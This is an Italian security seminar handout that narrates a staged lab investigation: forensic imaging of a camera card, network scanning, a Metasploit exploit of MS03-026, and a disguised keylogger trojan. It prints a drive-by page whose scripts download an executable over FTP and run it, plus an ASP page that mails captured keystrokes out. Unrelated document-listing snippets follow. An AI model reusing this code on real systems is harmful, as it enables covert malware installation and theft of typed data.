Cyberspace Threats and vulnerabilities

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Cyberspace Threats and vulnerabilities"

Transcript

1 Cyberspace Threats and vulnerabilities Francesco Arruzzoli, Cristiano Orlandi EHG2 SISIT (Società Italiana delle Scienze Informatiche e Tecnologiche) ATTENZIONE IL PRESENTE DOCUMENTO HA SCOPO ESCLUSIVAMENTE DIDATTICO ED INFORMATIVO, L UTILIZZO NON AUTORIZZATO DELLE TECNICHE E METODOLOGIE DI SEGUITO ILLUSTRATE SU DISPOSITIVI ALTRUI È SEVERAMENTE VIETATO E VIENE PERSEGUITO A NORMA DI LEGGE

2 Introduzione Anche quest anno vogliamo iniziare questa breve documentazione ringraziando i numerosissimi partecipanti presenti alla sessione di laboratorio e le tante di gradimento che abbiamo ricevuto, questo ci spinge a fare sempre meglio e a darvi appuntamento a presto. E anche quest anno per rendere più leggera la presentazione del laboratorio, considerando il dopo pranzo, abbiamo deciso di presentare complesse tecniche e metodologie di attacco attraverso la recitazione di una storia immaginaria elaborata però da esperienze professionali realmente accadute. I temi trattati non hanno avuto certamente un approccio tecnico approfondito ma il nostro obiettivo era quello di portare a conoscenza dei partecipanti l esistenza di tali tecniche e minacce cercando di far capire le modalità di innesco e realizzazione senza entrare nel dettaglio. Questo breve documento ha proprio lo scopo di approfondire tecnicamente quello che vi abbiamo mostrato nel laboratorio del seminario. La scenografia Per realizzare il laboratorio sono stati utilizzati 9 host, 2 switch, 1 Access Point, 2 telefono VOIP cordless e una network camera (Figura 1). Per poter disporre di 9 host in rete sul palco sono state utilizzate diverse tecnologie di virtualizzazione: VMWare, Microsoft Hypervisor e VirtualBox. 6 Figura 1 2

3 1 2 3 PC portatile con sistema operativo Linux in versione BackTrack, utilizzato da Arruzzoli/ Orlandi per effettuare le attività di analisi e sviluppo. Nel PC è stato installato il sistema di Virtualizzazione Virtualbox tramite il quale è stata creata una macchina virtuale basata su Sistema operativo XP ( 10 ) utilizzata da Arruzzoli come laboratorio per creare il programma Trojan. PC portatile con sistema operativo Windows Vista. Nel PC è stato installato il sistema di Virtualizzazione VMWare tramite il quale sono state create due macchina virtuali, la prima basata su Sistema operativo XP ( 9 ) utilizzata come Workstation dal Sospetto e la seconda basata su Windows 2003 Server ( 8 ) su cui è stato installato un centralino VOIP Server 3CX per gestire i telefoni VOIP wireless utilizzati nella dimostrazione ( 11 ). PC portatile con sistema operativo Windows 2008 Server. Nel PC è stato attivato il sistema di virtualizzazione HyperVisor di Microsoft tramite il quale sono state create tre macchine virtuali, la prima basata su Sistema operativo Windows 2003 Server SP1 ( 4 ) utilizzata come WEB Server intranet della sede cinese della AXAN, la seconda basata su Windows 2003 Server SP2 ( 5 ) che rappresentava il dominio aziendale axan.intranet e nella quale sono stati attivati i seguenti servizi : Active Directory, DNS, WINS, Certification Authority, DHCP e Mail Server e la terza macchina basata su sistema operativo Linux SUSE utilizzata come file server aziendale ( 7 ). 6 Network Camera utilizzata per effettuare le riprese dei dettagli sul palco 12 Switch utilizzato per creare la sottorete LAN (VLAN 1) della immaginaria sede della AXAN a Lanciano ( /24) 13 Switch utilizzato per creare la sottorete LAN (VLAN 2) della immaginaria sede della AXAN a Beijing ( /24) Tutto quello che vi è stato mostrato è stato realmente realizzato dal vivo, unica eccezione la trasmissione satellitare con l amministratore delegato della AXAN, dove per ovvi motivi logistici abbiamo dovuto simulare nella parte di comunicazione non potendo effettuare un reale collegamento satellitare, ma gli strumenti mostrati (ad es. l antenna) sono realmente utilizzati per effettuare tali collegamenti. 3

4 La Storia (AXAN Stories episodio 2) Ancora una volta gli Ethical Hacker / Security Analyst del gruppo EHG2 (Francesco Arruzzoli e Cristiano Orlandi) sono convocati presso la sede AXAN di Lanciano per effettuare delle attività di digital investigation su alcune vicende sospette accadute all interno dell azienda e più precisamente nella sede cinese dell AXAN a Beijing. Orlandi arriva per primo all AXAN e dopo aver sbrigato le pratiche burocratiche attende l arrivo del collega Francesco Arruzzoli. Quando Arruzzoli arriva trova Orlandi che è intento a provare un rilevatore laser di sostanze chimiche (Aidex nella realtà distribuito dalla PMB tecnologie avanzate) in grado in pochi secondi di riconoscerne varie tipologie (come ad es. esplosivi, droghe, etc.); dopo una veloce dimostrazione dell apparecchiatura, Arruzzoli prepara il trasmettitore satellitare portatile ( Immersat nella realtà distribuito dalla PMB tecnologie avanzate ) per effettuare una videoconferenza con l amministratore delegato dell AXAN che si trova nella sede aziendale in Australia. Una volta iniziata la videoconferenza l A.D. manifesta all EHG2 dei sospetti nei riguardi di un suo dirigente della ricerca e sviluppo presso la sede di Beijing, che reputa infedele all azienda e sospetta che il personaggio in questione un certo Barnaby Jones stia tentando di vendere a un gruppo di criminali sovietici i progetti del sistema di crittografia quantistica della AXAN: il progetto Q ( per maggiori informazioni sulla crittografia quantistica: ). Per avvalorare questa ipotesi l A.D. racconta un episodio in cui il resp. della sicurezza AXAN di Beijing aveva notato Barnaby Jones in un parcheggio aziendale mentre era intento a consegnare ad un personaggio non identificato una macchina fotografica digitale, contrariamente ad un regolamento dell AXAN che proibisce a tutti i dipendenti di portare in azienda qualsiasi tipo di strumento in grado di fotografare e/o fare riprese video. Prontamente il resp. della sicurezza era intervenuto mettendo in fuga la persona non identificata e sequestrando la macchina fotografica, che però ad una successiva analisi da parte dello stesso risultava avere la memoria completamente vuota, tuttavia l A.D. richiede che la macchina venga spedita alla sede della AXAN a Lanciano per essere esaminata dagli EHG2. L A.D. prega quindi l EHG2 di iniziare le attività investigazione all interno della propria azienda in modo da far luce sull accaduto. La Sede AXAN di Beijing La Sede AXAN di Lanciano La videoconferenza satellitare con L Amministratore della AXAN Il sospetto L EHG2 accetta il caso ed inizia ad investigare.. 4

5 Fase 1 : Analisi della memoria della macchina fotografica digitale. L EHG2 inizia ad investigare partendo dall analisi della memoria digitale della macchina fotografica sequestrata a Barnaby Jones. Scopo dell analisi è quello di cercare di recuperare eventuali tracce di file dati e/o immagini cancellati nella memoria digitale. Questa tecnica detta in gergo tecnico Data Carving che consiste nell analizzare il contenuto di un dispositivo di memorizzazione di massa, quali Hard Disk, SD, minsd, etc.., mettendosi alla ricerca di header, footer o comunque qualsiasi forma di dato strutturato associabile ad un file. Per non rischiare di modificare le informazioni sulla memoria digitale analizzata è bene lavorare su una copia di essa perfettamente identica alla memoria originale, questo permette di rendere ripetebile i test di analisi ed al contempo evita di inquinare la memoria oggetto di analisi. Per effettuare la copia della memoria digitale l EHG2 decide di utilizzare un ambiente Linux e il programma DCFLDD; tale combinazione viene spesso utilizzata nel campo della computer forensic proprio per effettuare delle copie che possono essere certificate come identiche all originale. Il sistema Linux infatti permette di collegare una memoria digitale senza montare automaticamente eventuali volumi in essa contenuti evitando così modifiche al file system a alle informazioni memorizzate. Il comando DCFLDD permette invece di effettuare una copia (su file o direttamente su un altra memoria fisica) di basso livello (bitstream copy) della memoria selezionata, questo permette quindi di copiare anche le eventuali tracce di file cancellati. Di fatto quando viene cancellato un file il sistema operativo rende disponibile lo spazio occupato da quel file per la sovrascrittura, quindi fino a quando quello spazio non sarà sovrascritto completamente sarà sempre possibile estrarre il file o parte di esso dalla memoria. Anche la formattazione veloce di fatto elimina gli indici del file system ma non sovrascrive i dati presenti. Orlandi comincia quindi con l acquisizione di una copia della memoria digitale (da 128 MB) della macchina fotografica inserendola in un lettore usb collegato al PC e successivamente procedendo alla copia attraverso il comando DCFLDD (fig.2) (Figura 2) 5

6 La sintassi utilizzata con il comando DCFLDD utilizza i seguenti parametri : sorgente buffer di copia dcfldd if=/dev/sda of=/root/desktop/fotolanciano.img bs=4096 destinazione Terminata l operazione di copia Orlandi passa alla seconda fase : analisi della memoria. Per effettuare l analisi alla ricerca di file cancellati Orlandi utilizza The Sleuth Kit, un tools in ambiente Linux, molto conosciuto in ambito della computer forensic in grado di gestire l intera fase di investigazione e analisi delle tracce digitali tramite la semplice ed intuitiva interfaccia WEB conosciuta come Autopsy (Figura 3). Figura 3 6

7 Il file di copia dell immagine viene importato per essere analizzato (Figura 4). Figura 4 Si effettua l analisi e si estraggono i file desiderati, compresi eventuali file cancellati ma recuperabili (Figura 5). Figura 5 7

8 Dai file recuperati Orlandi e Arruzzoli notano alcune immagine relative al progetto Q e capiscono che il sospetto(barnaby Jones) sembra davvero coinvolto in una qualche attività di spionaggio industriale, così decidono di controllare tutte le attività che il sospetto effettua all interno della AXAN. Fase 2: Information Gathering Per fare questo Orlandi e Arruzzoli devono intercettare tutte le attività svolte dal sospetto sul proprio PC e sulla rete dell AXAN. Arruzzoli decide di effettuare innanzitutto una analisi della sottorete dell AXAN a Beijing attraverso il programma NMAP. Grazie ad NMAP è possibile effettuare, in tempi rapidi, un analisi dettagliata di tutti gli host connessi in rete ottenendo diverse informazioni come ad esempio porte e servizi attivi, tipo di sistema operativo, etc.. Altro aspetto molto importante è che NMAP permette un analisi della rete attraverso varie modalità che possono essere più o meno invasive. Una di queste modalità è quella denominata stealth dove attraverso la dichiarazione di specifici parametri, NMAP effettua una analisi invisibile agli occhi degli host analizzati e ad altri apparati o soluzioni (ad es. Intrusion Detection, firewall, etc.). Sfruttando proprio questa particolare funzionalità di NMAP Arruzzoli effettua una scansione stealth della sottorete avvalendosi dell interfaccia grafica di NMAP (che storicamente viene utilizzato da riga di comando) : ZENMAP (Figura 6). Figura 6 Al termine dell esecuzione del comando NMAP Arruzzoli analizza i risultati e nota che tra gli host indviduati sono presenti dei sistemi operativi Windows 2003 con molti servizi attivi (Figura 7). Decide allora di effettuare un vulnerability assessment su questi host per cercare di individuare eventuali brecce nella sicurezza da utilizzare per controllare il sospetto. 8

9 Figura 7 Arruzzoli effettua un Vulnerability Assessment utilizzando Nessus (Figura 8) un programma client server open source che tramite lo scan e l'abilitazione di appositi plugin configurabili analizza a seconda della tipologia di host eventuali vulnerabilità presenti (Figura 9), suggerendo le possibili soluzioni e creando report di facile analisi (Figura 10) in vari formati (HTML, pdf, etc etc). Figura 8 9

10 Il report di analisi effettuato da Nessus (Figura 10) mette in evidenza nella sottorete x una vulnerabilità (security hole) relativa ad un servizio attivo su uno dei server analizzati. In particolare il security hole si riferisce al servizio RPC che non essendo stato adeguatamente aggiornato (Microsoft Security Bulletin MS03 026) permette di eseguire codice da remoto sfruttando un bug di programmazione. Figura 9 Figura 10 10

11 Attraverso un analisi del DNS intranet, effettuata con il programma dnswalk (Figura 11), scopre che il server su cui è attivo il servizio RPC è il server intranet della AXAN. Arruzzoli decide di sfruttare la vulnerabilità MS per realizzare un attacco informatico mirato a controllare e monitorare tutte le attività del sospetto, sfruttando proprio il server intranet come veicolo di trasmissione di un trojan con funzionalità di key logger, cioè in grado di registrare le sequenze di tasti digitati sulla tastiera e trasmetterle ad un utente remoto. Figura 11 Per realizzare l attacco vengono pianificate le seguenti fasi preparatorie : 1) Entrare nel server remoto sfruttando la vulnerabilità MS ) Realizzare un trojan in grado di potersi camuffare adeguatamente, installare automaticamente ed essere autonomo nelle attività di acquisizione e invio delle informazioni. 3) Social engineering : creare le modalità ed i contesti per rendere insospettabile l installazione e l attività del trojan. Per effettuare l attacco attraverso la vulnerabilità MS Arruzzoli utilizza Metasploit (Figura 12), un vero e proprio framework per la creazione di exploits. Gli exploits disponibili per Metasploit possono essere configurati in ogni singola parte per meglio adattarsi al target in questione. E possibile selezionare un payload da lanciare al termine dell esecuzione del exploit per permettere all utente di eseguire codice e/o qualsiasi altra operazione. Nel caso specifico Arruzzoli utilizza la versione web client del framework Metasploit, selezionando tra gli exploits proprio quello relativo alla vulnerabilità MS (Figura 13). 11

12 Figura 12 Figura 13 12

13 Una volta selezionato l exploits Arruzzoli seleziona il payload e in questo caso decide di far eseguire una sessione VNC remota per analizzare direttamente il server con un collegamento desktop remoto e quindi impostati i principali parametri di attacco lo esegue (Figura 14). Figura 14 In pochi secondi l exploits viene eseguito (Figura 15) e successivamente anche il payload (Figura 16) Figura 15 Figura 16 Una volta entrato nel server Arruzzoli verifica la struttura del server e lo predispone per l attacco. 13

14 Fase 3: controllo delle comunicazioni informatiche La fase successiva prevede la realizzazione di Trojan in grado svolgere attività di key logger. Per realizzare questo programma Arruzzoli allestisce un laboratorio virtuale installando una Macchina Virtuale con sistema operativo Windows XP e il relativo ambiente di sviluppo. La realizzazione di un laboratorio tramite macchine virtuali è altamente raccomandato in quanto Arruzzoli decide di attingere a codice sorgente disponibile in rete relativo a diverse tipologie di virus, spyware e trojan, una esecuzione involontaria di questi codici potrebbe compromettere pesantemente un sistema operativo, quindi la scelta di un ambiente virtuale rende più sicuro ed isolato l ambiente di sviluppo. Arruzzoli utilizza come ambiente Virtuale Virtualbox (per maggiori informazioni: in un ambiente operativo Linux (Figura 17). Figura 17 Arruzzoli prendendo spunto da codici esistenti realizza un generatore di Trojan in grado di personalizzare i parametri principali per il suo corretto funzionamento. I Trojan generati sono in grado, una volta eseguiti, di mutare in un file diverso dall eseguibile iniziale con un nome apparentemente uguale a quelli utilizzati da i processi del sistema operativo di Microsoft (ad es. csrss.exe). Infatti per rendere ancora più invisibile il trojan Arruzzoli sfrutta i codici unicode per nominare il file eseguibile. Sfruttando, infatti, la caratteristica omografica dei caratteri unicode è possibile utilizzare caratteri graficamente uguali ma appartenenti a set diversi (ad es. set latino e set cirillico) in questo modo lo stesso carattere graficamente uguale sarà riconosciuto dasl sistema operativo con codici diversi (Figura 18 ). 14

15 File con lo stesso nome nella stessa cartella? No il nome pippo.txt del primo file utilizza il carattere p del set cirillico che è identificato da un altro codice. Figura 18 Per creare il nome del file con un set di caratteri diversi Arruzzoli un programma realizzato dagli ehg2 (Figura 19). Terminata la preparazione dei parametri il Trojan viene creato (Figura 20). Figura 19 Figura 20 15

16 Una volta realizzato il programma Trojan viene preparata la sequenza di attacco e distribuzione. Avendo ottenuto accesso al sito intranet aziendale viene posto in evidenza nella home page un presunto messaggio dell amministrazione che obbliga gli utenti ad effettuare un aggiornamento di sicurezza (Figura 21). Figura 21 Ora l obiettivo principale è quello di far scaricare ed eseguire il trojan automaticamente. Questa operazione si articola in due fasi: 1. Creazione di uno script in grado di effettuare il download del trojan. 2. Creazione di uno script per eseguire localmente il Trojan dopo il download Questi devono essere eseguiti senza che i sistemi di protezione (ad es. antivirus) li blocchino, l intera sequenza viene completa così in un solo click di mouse (Figura 22). Figura 22 16

17 L esecuzione degli script viene facilitata anche dalle impostazioni dei web browser configurati, per gli indirizzi della rete interna, con un livello meno restrittivo della sicurezza (come ad es. il sito intranet dell AXAN), supponendo che tali indirizzi, essendo aziendali, siano sicuri. Una prima parte dello script viene eseguita quando la pagina (SecurityUpdate.html ) viene caricata nel web browser, il codice sfrutta l oggetto FileSystemObject di Microsoft per creare un file di testo (ftpparam.txt) contenente tutti i comandi per effettuare il download del trojan tramite una sessione FTP e un file batch (ftpstart.bat) che invece eseguirà la connessione ftp passando i comandi inseriti nel file precedente : <HTML> <HEAD> <TITLE>Security Update 115/08 AXAN industries </TITLE> <SCRIPT LANGUAGE="VBScript"> Set fs = CreateObject("Scripting.FileSystemObject") Set a = fs.createtextfile("c:\windows\ftpparam.txt") a.writeline("open ") a.writeline("anonymous") a.writeline("anonymous") a.writeline("binary") a.writeline("hash") a.writeline("lcd c:\windows") a.writeline("get SecurityUpdate.exe") a.writeline("bye") a.close Set fs = CreateObject("Scripting.FileSystemObject") Set a = fs.createtextfile("c:\windows\ftpstart.bat") a.writeline("ftp s:c:\windows\ftpparam.txt") a.close </SCRIPT>. 17

18 La seconda parte dello script esegue il file batch attraverso l utilizzo dell oggetto WScript.shell, il parametro true nella riga: shell.run('"c:\\windows\\ftpstart.bat"',1, true); indica che prima di eseguire altro codice il browser deve attendere la fine del comando (download del trojan) :. <SCRIPT LANGUAGE="javascript"> var shell = new ActiveXObject("WScript.shell"); shell.run('"c:\\windows\\ftpstart.bat"',1, true); shell.quit; </SCRIPT> </HEAD> <BODY>.. Appena terminato il download viene eseguita l ultima parte di codice, l attivazione del trojan: </BODY> <SCRIPT LANGUAGE="javascript"> var shell = new ActiveXObject("WScript.shell"); shell.run('"c:\\windows\\securityupdate.exe "'); shell.quit; </SCRIPT> </html> Il Trojan una volta eseguito muta in un nuovo file (csrss.exe) cancellando il precedente (SecurityUpdate.exe) e tutti i file creati per effettuare l attacco (ftpparam.txt e ftpstart.bat). A questo punto il trojan comincia ad acquisire le informazioni ed ad inviarle attraverso una connessione http alla pagina .asp. Infatti durante l analisi del server intranet Arruzzoli aveva notato che tale server disponeva di un servizio smtp utilizzato da altre applicazioni, il file .asp sfruttando l oggetto CDO di Microsoft invia attraverso il servizio smtp le mail con le informazioni raccolte dal trojan ad Arruzzoli (Figura 23) 18

19 Pagina .asp : <html> <body> <% Set mymail=createobject("cdo.message") mymail.subject="sending with CDO" mymail.from="logger@test.spy" mymail.to= Request(" ") mymail.htmlbody="<html><body>"&request("contenuto") & "</body></html>" mymail.send set mymail=nothing %> </body> </html> Figura 23 19

20 Dalle informazioni raccolte tramite il trojan Arruzzoli ed Orlandi ottengono le prove necessarie per dimostrare gli accessi illeciti del sospetto ai file riservati del progetto Q. Per completare l indagine Orlandi ritiene opportuno monitorare anche le telefonate effettuate e ricevute dal sospetto in Azienda e quindi decide di recarsi a Beijing per effettuare il controllo telefonico e tentare di mettere sottopressione il sospetto nella speranza di un suo passo falso. Appena giunto alla sede della AXAN a Beijing, in accordo con l A.D. si presenta come auditor per la sicurezza dei sistemi informatici aziendali, con una scusa ottenuto l accesso ad un locale secondario dell azienda connette il suo portatile alla rete aziendale ed esegue un Man in the middle (per maggiori informazioni sul M.I.T.M. vedi ) tra i telefoni VOIP del sospetto e la centrale telefonica aziendale, eseguendo inoltre il programma CAIN per effettuare la registrazione delle conversazioni (figura 24). Dopo alcuni minuti incontra il sospetto e attraverso una attività di social engineering lo innervosisce, a questo punto il sospetto appena Orlandi si congeda da lui telefona immediatamente al complice permettendo così a Orlandi di registrare la conversazione e il numero di telefono chiamato. 04/10/ :21:32 04/10/ :25: :42004 (PCMU,8khz,Mono) ***** (PCMU,8khz,Mono) RTP WAV byt Figura 24 Raccolte tutte queste evidenze in una dettagliata relazione Orlandi e Arruzzoli consegnano il tutto all A.D. dell AXAN che dopo averli ringraziati e congedati procede in merito alla situazione.fine della storia. 20

21 Riferimenti : Autopsy CAIN Crittografia quantistica DCFLDD DNSWALK EHG2 NESSUS NMAP, ZENMAP SISIT (Società Italiana delle Scienze Informatiche e Tecnologiche) 21

LA GESTIONE DELLE VISITE CLIENTI VIA WEB

LA GESTIONE DELLE VISITE CLIENTI VIA WEB LA GESTIONE DELLE VISITE CLIENTI VIA WEB L applicazione realizzata ha lo scopo di consentire agli agenti l inserimento via web dei dati relativi alle visite effettuate alla clientela. I requisiti informatici

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni

Dettagli

Manuale NetSupport v.10.70.6 Liceo G. Cotta Marco Bolzon

Manuale NetSupport v.10.70.6 Liceo G. Cotta Marco Bolzon NOTE PRELIMINARI: 1. La versione analizzata è quella del laboratorio beta della sede S. Davide di Porto, ma il programma è presente anche nel laboratorio alfa (Porto) e nel laboratorio di informatica della

Dettagli

Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica.

Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica. Tecnologie informatiche ACCESSO REMOTO CON WINDOWS Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica. Un esempio di tale servizio

Dettagli

Il sofware è inoltre completato da una funzione di calendario che consente di impostare in modo semplice ed intuitivo i vari appuntamenti.

Il sofware è inoltre completato da una funzione di calendario che consente di impostare in modo semplice ed intuitivo i vari appuntamenti. SH.MedicalStudio Presentazione SH.MedicalStudio è un software per la gestione degli studi medici. Consente di gestire un archivio Pazienti, con tutti i documenti necessari ad avere un quadro clinico completo

Dettagli

OpenVAS - Open Source Vulnerability Scanner

OpenVAS - Open Source Vulnerability Scanner OpenVAS - Open Source Vulnerability Scanner di Maurizio Pagani Introduzione OpenVAS è un framework che include servizi e tool per la scansione e la gestione completa delle vulnerabilità. Un vulnerability

Dettagli

Configurazione del servizio Dynamic DNS. Questa procedura ti guiderà durante i 4 passi necessari alla messa in funzione del servizio.

Configurazione del servizio Dynamic DNS. Questa procedura ti guiderà durante i 4 passi necessari alla messa in funzione del servizio. Configurazione del servizio Dynamic DNS Questa procedura ti guiderà durante i 4 passi necessari alla messa in funzione del servizio. La prima operazione da svolgere consiste nella registrazione al sito:

Dettagli

MyFRITZ!, Dynamic DNS e Accesso Remoto

MyFRITZ!, Dynamic DNS e Accesso Remoto MyFRITZ!, Dynamic DNS e Accesso Remoto 1 Introduzione In questa mini-guida illustreremo come accedere da Internet al vostro FRITZ!Box in ufficio o a casa, quando siete in mobilità o vi trovate in luogo

Dettagli

. A primi passi con microsoft a.ccepss SommarIo: i S 1. aprire e chiudere microsoft access Start (o avvio) l i b tutti i pro- grammi

. A primi passi con microsoft a.ccepss SommarIo: i S 1. aprire e chiudere microsoft access Start (o avvio) l i b tutti i pro- grammi Capitolo Terzo Primi passi con Microsoft Access Sommario: 1. Aprire e chiudere Microsoft Access. - 2. Aprire un database esistente. - 3. La barra multifunzione di Microsoft Access 2007. - 4. Creare e salvare

Dettagli

1) GESTIONE DELLE POSTAZIONI REMOTE

1) GESTIONE DELLE POSTAZIONI REMOTE IMPORTAZIONE ESPORTAZIONE DATI VIA FTP Per FTP ( FILE TRANSFER PROTOCOL) si intende il protocollo di internet che permette di trasferire documenti di qualsiasi tipo tra siti differenti. Per l utilizzo

Dettagli

ANALISI FORENSE. irecovery_analisi_forence.indd 1 21/01/14 17:48

ANALISI FORENSE. irecovery_analisi_forence.indd 1 21/01/14 17:48 ANALISI FORENSE irecovery_analisi_forence.indd 1 21/01/14 17:48 COSA è L informatica forense è la scienza che studia l individuazione, la conservazione, la protezione, l estrazione, la documentazione,

Dettagli

Il web server Apache Lezione n. 3. Introduzione

Il web server Apache Lezione n. 3. Introduzione Procurarsi ed installare il web server Apache Introduzione In questa lezione cominciamo a fare un po di pratica facendo una serie di operazioni preliminari, necessarie per iniziare a lavorare. In particolar

Dettagli

INFN Napoli NESSUS. IL Security Scanner. Francesco M. Taurino 1

INFN Napoli NESSUS. IL Security Scanner. Francesco M. Taurino 1 NESSUS IL Security Scanner Francesco M. Taurino 1 La vostra RETE Quali servizi sono presenti? Sono configurati in modo sicuro? Su quali macchine girano? Francesco M. Taurino 2 Domanda Quanto e sicura la

Dettagli

Dipartimento di Scienze Applicate

Dipartimento di Scienze Applicate DIPARTIMENTO DI SCIENZE APPLICATE Università degli Studi di Napoli Parthenope Centro Direzionale di Napoli Isola C4 80143 Napoli dsa@uniparthenope.it P. IVA 01877320638 Dipartimento di Scienze Applicate.

Dettagli

Manuale Operativo per la firma digitale

Manuale Operativo per la firma digitale Manuale Operativo per la firma digitale Indice 1. Introduzione... 3 2. Installazione del lettore di smart card... 3 3. Installazione del Dike... 8 4. Attivazione della smart card... 9 5. PIN per la firma

Dettagli

Virtualizzazione VirtualBox 4.1.2 su Host Windows

Virtualizzazione VirtualBox 4.1.2 su Host Windows Virtualizzazione VirtualBox 4.1.2 su Host Windows La virtualizzazione, quando riferita all informatica, consiste nella creazione di una versione virtuale di una risorsa normalmente fornita fisicamente.

Dettagli

Manuale di configurazione di Notebook, Netbook e altri dispositivi personali che accedono all Hot Spot @ll-in e di programmi per la comunicazione

Manuale di configurazione di Notebook, Netbook e altri dispositivi personali che accedono all Hot Spot @ll-in e di programmi per la comunicazione Manuale di configurazione di Notebook, Netbook e altri dispositivi personali che accedono all Hot Spot @ll-in e di programmi per la comunicazione on-line installati sia su dispositivi personali che nelle

Dettagli

2010 Ing. Punzenberger COPA-DATA Srl. Tutti i diritti riservati.

2010 Ing. Punzenberger COPA-DATA Srl. Tutti i diritti riservati. 2010 Ing. Punzenberger COPA-DATA Srl Tutti i diritti riservati. Tutti i diritti riservati la distribuzione e la copia - indifferentemente dal metodo - può essere consentita esclusivamente dalla dittacopa-data.

Dettagli

ESERCITAZIONE Semplice creazione di un sito Internet

ESERCITAZIONE Semplice creazione di un sito Internet ESERCITAZIONE Semplice creazione di un sito Internet Sistemi e Tecnologie Informatiche - Prof. Gregorio Cosentino 1 Internet Una rete globale che connette milioni di computer in tutto il mondo, anarchica

Dettagli

Manuale Operativo per la firma digitale

Manuale Operativo per la firma digitale Manuale Operativo per la firma digitale Indice 1. Introduzione...3 2. Installazione del lettore di smart card...4 3. Installazione del Dike...9 4. Attivazione della smart card... 10 5. PIN per la firma

Dettagli

SOMMARIO... 3 INTRODUZIONE...

SOMMARIO... 3 INTRODUZIONE... Sommario SOMMARIO... 3 INTRODUZIONE... 4 INTRODUZIONE ALLE FUNZIONALITÀ DEL PROGRAMMA INTRAWEB... 4 STRUTTURA DEL MANUALE... 4 INSTALLAZIONE INRAWEB VER. 11.0.0.0... 5 1 GESTIONE INTRAWEB VER 11.0.0.0...

Dettagli

IRSplit. Istruzioni d uso 07/10-01 PC

IRSplit. Istruzioni d uso 07/10-01 PC 3456 IRSplit Istruzioni d uso 07/10-01 PC 2 IRSplit Istruzioni d uso Indice 1. Requisiti Hardware e Software 4 1.1 Requisiti Hardware 4 1.2 Requisiti Software 4 2. Installazione 4 3. Concetti fondamentali

Dettagli

EM1017 Scheda di rete Gigabit USB 3.0

EM1017 Scheda di rete Gigabit USB 3.0 EM1017 Scheda di rete Gigabit USB 3.0 2 ITALIANO EM1017 - Scheda di rete Gigabit USB 3.0 Contenuti 1.0 Introduzione... 2 1.1 Funzioni e caratteristiche... 2 1.2 Contenuto della confezione... 2 1.3 Operazioni

Dettagli

PORTALE CLIENTI Manuale utente

PORTALE CLIENTI Manuale utente PORTALE CLIENTI Manuale utente Sommario 1. Accesso al portale 2. Home Page e login 3. Area riservata 4. Pagina dettaglio procedura 5. Pagina dettaglio programma 6. Installazione dei programmi Sistema operativo

Dettagli

CARJAVA. Il software per gestire l accettazione. Da Tablet o Smartphone. Archivia i dati su PC e crea le commesse direttamente nel gestionale

CARJAVA. Il software per gestire l accettazione. Da Tablet o Smartphone. Archivia i dati su PC e crea le commesse direttamente nel gestionale CARJAVA Il software per gestire l accettazione Da Tablet o Smartphone Archivia i dati su PC e crea le commesse direttamente nel gestionale 1: Indice: Pag. 3 Principi Pag. 4 1- Lato pc 1.1 Download e installazione

Dettagli

Premessa Le indicazioni seguenti sono parzialmente tratte da Wikipedia (www.wikipedia.com) e da un tutorial di Pierlauro Sciarelli su comefare.

Premessa Le indicazioni seguenti sono parzialmente tratte da Wikipedia (www.wikipedia.com) e da un tutorial di Pierlauro Sciarelli su comefare. Macchine virtuali Premessa Le indicazioni seguenti sono parzialmente tratte da Wikipedia (www.wikipedia.com) e da un tutorial di Pierlauro Sciarelli su comefare.com 1. Cosa sono In informatica il termine

Dettagli

MODELLO CLIENT/SERVER. Gianluca Daino Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena daino@unisi.it

MODELLO CLIENT/SERVER. Gianluca Daino Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena daino@unisi.it MODELLO CLIENT/SERVER Gianluca Daino Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena daino@unisi.it POSSIBILI STRUTTURE DEL SISTEMA INFORMATIVO La struttura di un sistema informativo

Dettagli

FRANCESCO MARINO - TELECOMUNICAZIONI

FRANCESCO MARINO - TELECOMUNICAZIONI Classe: Data Autore: Francesco Marino http://www.francescomarino.net info@francescomarino.net Esercitazione n. 18 Creazione e configurazione di una connessione remota in Windows 9x Gruppo: Alunni assenti

Dettagli

EW1051 Lettore di schede USB

EW1051 Lettore di schede USB EW1051 Lettore di schede USB 2 ITALIANO EW1051 Lettore di schede USB Contenuti 1.0 Introduzione... 2 1.1 Funzioni e caratteristiche... 2 1.2 Contenuto della confezione... 2 2.0 Installazione del EW1051

Dettagli

GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0)

GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0) ------------------------------------------------- GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0) GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0)... 1 Installazione Billiards Counter... 2 Primo avvio e configurazione

Dettagli

Installazione e caratteristiche generali 1

Installazione e caratteristiche generali 1 Installazione e caratteristiche generali 1 Introduzione SIGLA Ultimate e SIGLA Start Edition possono essere utilizzati solo se sono soddisfatti i seguenti prerequisiti: Microsoft.Net Framework 3.5 (consigliato

Dettagli

Software Servizi Web UOGA

Software Servizi Web UOGA Manuale Operativo Utente Software Servizi Web UOGA S.p.A. Informatica e Servizi Interbancari Sammarinesi Strada Caiese, 3 47891 Dogana Tel. 0549 979611 Fax 0549 979699 e-mail: info@isis.sm Identificatore

Dettagli

FPf per Windows 3.1. Guida all uso

FPf per Windows 3.1. Guida all uso FPf per Windows 3.1 Guida all uso 3 Configurazione di una rete locale Versione 1.0 del 18/05/2004 Guida 03 ver 02.doc Pagina 1 Scenario di riferimento In figura è mostrata una possibile soluzione di rete

Dettagli

Sistemi di Antivirus CEFRIEL. Politecnico di Milano. Consorzio per la Formazione e la Ricerca in Ingegneria dell Informazione. Politecnico di Milano

